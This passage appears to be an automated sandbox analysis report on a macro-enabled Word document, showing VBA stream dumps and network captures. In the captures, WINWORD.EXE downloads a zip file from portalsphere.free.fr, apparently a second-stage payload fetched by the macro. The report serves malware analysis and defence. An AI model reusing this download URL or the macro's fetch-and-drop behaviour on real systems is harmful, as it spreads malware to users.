                            Data ASCII:. . . D . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . . . . . . . . . . . . . . . 3 . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . G p < S X f e H G . . . . . . . . D . . . . . Y . . n . . . . G p < S X f e H G P N G . . . . . . . . I H D R . . . . . . . . . . . . . / { . . . . s R G B . . . . . . p H Y s . . . . . . . . 3 { . . . I D A T H K [ L P . . 2 . . . @ P . . D . . > B . . .
                            Data Raw:a5 04 00 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 c2 01 86 01 90 01 9f 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 36 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 33 00 0b f0 12 00 00 00 04 41 01 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 00 00 10 f0 04 00 00 00 00 00
                            Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 374
                            General
                            Stream Path:Macros/PROJECT
                            CLSID:
                            File Type:ASCII text, with CRLF line terminators
                            Stream Size:374
                            Entropy:5.344453383898647
                            Base64 Encoded:True
                            Data ASCII:I D = " { 4 7 6 5 3 F 2 6 - B 4 6 1 - 4 3 1 F - 8 7 6 7 - 8 B 7 4 C D B 3 4 D F 1 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 0 3 2 F A F 8 F E F 8 F E F 8 F E F 8 F E " . . D P B = " 5 B 5 9 9 1 0 8 B D 0 9 B D 0 9 B D " . . G C = " 8 6 8 4 4 C 6 5 5 C B B 8 6 B C 8 6 B C 7 9 " . . . . [ H o s t E x t e n d e r I n f o ] . .
                            Data Raw:49 44 3d 22 7b 34 37 36 35 33 46 32 36 2d 42 34 36 31 2d 34 33 31 46 2d 38 37 36 37 2d 38 42 37 34 43 44 42 33 34 44 46 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
                            Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41
                            General
                            Stream Path:Macros/PROJECTwm
                            CLSID:
                            File Type:data
                            Stream Size:41
                            Entropy:3.0773844850752607
                            Base64 Encoded:False
                            Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                            Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
                            Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3441
                            General
                            Stream Path:Macros/VBA/_VBA_PROJECT
                            CLSID:
                            File Type:data
                            Stream Size:3441
                            Entropy:4.543463912136946
                            Base64 Encoded:False
                            Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ .
                            Data Raw:cc 61 af 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                            Stream Path: Macros/VBA/__SRP_0, File Type: data, Stream Size: 2557
                            General
                            Stream Path:Macros/VBA/__SRP_0
                            CLSID:
                            File Type:data
                            Stream Size:2557
                            Entropy:4.368205148043407
                            Base64 Encoded:False
                            Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F E . - \\ . . . . . . . . . . . . . . . . . . . . . . . E . . . . . . . . . ) . . . . . . . . . Y . . . . . . . . . . . . . . . . . . .
                            Data Raw:93 4b 2a af 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 80 02 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00
                            Stream Path: Macros/VBA/__SRP_1, File Type: data, Stream Size: 144
                            General
                            Stream Path:Macros/VBA/__SRP_1
                            CLSID:
                            File Type:data
                            Stream Size:144
                            Entropy:2.9334168400073426
                            Base64 Encoded:False
                            Data ASCII:r U . . . . . . . . . . . . . . . ~ } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . u r l . . . . . . . . f i l e O u t P a t h . . . . . . . . d i r r g . . . . . . .
                            Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 7d 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 03 00 00 09 f9 02 00 00 00 00 00 00 11 07 00 00 00 00 00 00 08 00 00 00 00 00 01 00 01 00 00 08 03 00 00 00 75 72 6c 03 00 00 08 0b 00 00 00 66 69 6c 65 4f 75 74 50 61 74 68 02 00 00 08
                            Stream Path: Macros/VBA/__SRP_2, File Type: data, Stream Size: 1728
                            General
                            Stream Path:Macros/VBA/__SRP_2
                            CLSID:
                            File Type:data
                            Stream Size:1728
                            Entropy:4.051787019415101
                            Base64 Encoded:False
                            Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . I . . . . . . . Q . . . . . . . q . . . . . . . A . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . 9 . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . y . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 06 00 06 00 1f 00 00 00 e9 06 00 00 00 00 00 00 49 08 00 00 00 00 00 00 51 09 00 00 00 00 00 00 71 09 00 00 00 00 00 00 41 0c 00 00 00 00 00 00 89 09 00 00 00 00 00 00 21 0a 00 00 00 00 00 00 d9 09 00 00 00 00 00 00 b1 0c 00 00 00 00
                            Stream Path: Macros/VBA/__SRP_3, File Type: data, Stream Size: 320
                            General
                            Stream Path:Macros/VBA/__SRP_3
                            CLSID:
                            File Type:data
                            Stream Size:320
                            Entropy:2.6524913771886793
                            Base64 Encoded:False
                            Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . , . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 0 ( . A . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . 0 ( . . . . . . . . . . . ` . . . . . . . . . . . . . 0 $ . . . . . . . . . . . ` . . . . . . . . . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . $ . A . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . n . . . . . . .
                            Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 40 00 00 00 04 00 2c 00 01 01 00 00 00 00 02 00 00 00 04 60 08 00 05 07 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 81 00 00 00 00 00 01 00 91 00 00 00 00 00 01 00 00 00 00 00 1e 30 30 28 00 41 01 00 00 00 00 02 00 01 00 04 60 04 00 09 07 ff ff ff
                            Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 634
                            General
                            Stream Path:Macros/VBA/dir
                            CLSID:
                            File Type:data
                            Stream Size:634
                            Entropy:6.326908155637434
                            Base64 Encoded:True
                            Data ASCII:. v . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . e . i . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * . \\ C . . . . f . a . . . ! O f f i c . g O . f . i . c
                            Data Raw:01 76 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 65 ca 89 69 02 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                            Stream Path: WordDocument, File Type: data, Stream Size: 4096
                            General
                            Stream Path:WordDocument
                            CLSID:
                            File Type:data
                            Stream Size:4096
                            Entropy:2.093976725435268
                            Base64 Encoded:False
                            Data ASCII:. { . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . f f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . . . .
                            Data Raw:ec a5 c1 00 7b 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 8a 08 00 00 0e 00 62 6a 62 6a 9c b4 9c b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 fe de d5 66 fe de d5 66 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Mar 4, 2025 09:50:19.336694002 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:19.341815948 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:19.341892958 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:19.342020035 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:19.347218037 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:19.961134911 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:19.961174965 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:19.961230040 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:19.961265087 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:19.961267948 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:19.961302042 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:19.961308002 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:19.961335897 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:19.961354017 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:19.961369991 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:19.961388111 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:19.961406946 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:19.961426973 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:19.961442947 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:19.961457014 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:19.961483002 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:19.961497068 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:19.961646080 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:19.966681957 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:19.966717005 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:19.966753006 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:19.966756105 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:19.966767073 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:19.966790915 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:19.966805935 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:19.966840982 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.051913023 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.051966906 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.051999092 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.052002907 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.052037001 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.052043915 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.052043915 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.052076101 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.052117109 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.052134037 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.052351952 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.052402973 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.052409887 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.052439928 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.052459002 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.052474976 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.052500963 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.052510023 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.052529097 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.052546024 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.052597046 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.053322077 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.053356886 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.053381920 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.053392887 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.053409100 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.053426981 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.053446054 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.053462982 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.053498983 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.053508043 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.054128885 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.054162025 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.054184914 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.054198027 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.054215908 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.054233074 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.054255009 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.054269075 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.054286003 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.054305077 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.054316044 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.054349899 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.054984093 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.055038929 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.055058002 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.055116892 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.057082891 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.057142973 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.142909050 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.142950058 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.142987967 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.143009901 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.143042088 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.143043041 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.143089056 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.143095970 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.143131018 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.143145084 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.143167019 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.143183947 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.143199921 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.143235922 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.143249989 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.143270016 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.143305063 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.143322945 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.143357038 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.143363953 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.143416882 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.143707037 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.143740892 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.143768072 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.143774986 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.143807888 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.143810987 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.143834114 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.143846035 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.143856049 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.143881083 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.143891096 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.143918037 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.143937111 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.143950939 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.143959999 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.143985987 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.143999100 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.144119978 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.144153118 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.144172907 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.144188881 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.144202948 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.144224882 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.144247055 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.144274950 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.144366980 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.144401073 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.144432068 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.144438982 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.144459963 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.144509077 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.144512892 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.144561052 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.144562006 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.144594908 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.144619942 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.144630909 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.144653082 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.144665956 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.144680977 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.144701004 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.144711971 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.144735098 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.144752026 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.144769907 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.144792080 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.144809008 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.144819975 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.144968987 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.145293951 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.145328045 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.145347118 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.145378113 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.145385027 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.145420074 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.145437002 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.145457029 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.145467043 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.145492077 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.145505905 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.145531893 CET8049719212.27.63.154192.168.2.6
                            Mar 4, 2025 09:50:20.145565033 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.145641088 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.145736933 CET4971980192.168.2.6212.27.63.154
                            Mar 4, 2025 09:50:20.150909901 CET8049719212.27.63.154192.168.2.6

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Mar 4, 2025 09:50:19.306499958 CET5409853192.168.2.61.1.1.1
                            Mar 4, 2025 09:50:19.335891962 CET53540981.1.1.1192.168.2.6

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Mar 4, 2025 09:50:19.306499958 CET192.168.2.61.1.1.10xd72bStandard query (0)portalsphere.free.frA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Mar 4, 2025 09:50:16.733129978 CET1.1.1.1192.168.2.60x3ccdNo error (0)ecs-office.s-0005.dual-s-msedge.netshed.s-0005.dual-s-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                            Mar 4, 2025 09:50:16.733129978 CET1.1.1.1192.168.2.60x3ccdNo error (0)shed.s-0005.dual-s-dc-msedge.nets-0005.dual-s-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                            Mar 4, 2025 09:50:16.733129978 CET1.1.1.1192.168.2.60x3ccdNo error (0)s-0005.dual-s-dc-msedge.net52.123.131.14A (IP address)IN (0x0001)false
                            Mar 4, 2025 09:50:16.733129978 CET1.1.1.1192.168.2.60x3ccdNo error (0)s-0005.dual-s-dc-msedge.net52.123.130.14A (IP address)IN (0x0001)false
                            Mar 4, 2025 09:50:19.335891962 CET1.1.1.1192.168.2.60xd72bNo error (0)portalsphere.free.frperso154-g5.free.frCNAME (Canonical name)IN (0x0001)false
                            Mar 4, 2025 09:50:19.335891962 CET1.1.1.1192.168.2.60xd72bNo error (0)perso154-g5.free.fr212.27.63.154A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • portalsphere.free.fr

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.649719212.27.63.154805560C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            TimestampBytes transferredDirectionData
                            Mar 4, 2025 09:50:19.342020035 CET337OUTGET /phUploader/uploads/1741130958.zip HTTP/1.1
                            Accept: */*
                            Accept-Language: en-ch
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                            Host: portalsphere.free.fr
                            Connection: Keep-Alive
                            Mar 4, 2025 09:50:19.961134911 CET1236INHTTP/1.1 200 OK
                            Date: Tue, 04 Mar 2025 08:50:19 GMT
                            Server: Apache/ProXad [Jan 23 2019 20:05:46]
                            Last-Modified: Mon, 03 Mar 2025 20:00:17 GMT
                            ETag: "2e4e0d125-1736c-67c60a51"
                            Connection: close
                            Accept-Ranges: bytes
                            Content-Length: 95084
                            Content-Type: application/zip
